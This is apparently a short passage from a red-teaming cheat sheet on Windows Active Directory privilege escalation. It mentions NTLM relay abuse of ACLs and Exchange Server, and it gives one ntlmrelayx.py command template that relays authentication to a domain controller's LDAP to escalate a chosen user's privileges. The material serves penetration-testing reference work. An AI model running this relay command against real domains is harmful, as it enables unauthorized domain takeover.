0xJs/RedTeaming_CheatSheet/windows-ad/Domain-Privilege-Escalation.md

 #### NTLMRelay
 - It is possible to abuse ACL with NTLMRelay abuse
-- Also possible to abuse Exchange Server: https://pentestlab.blog/2019/09/04/microsoft-exchange-domain-escalation/
 ```
 ntlmrelayx.py -t ldap://<DC IP> --escalate-user <USER>
 ```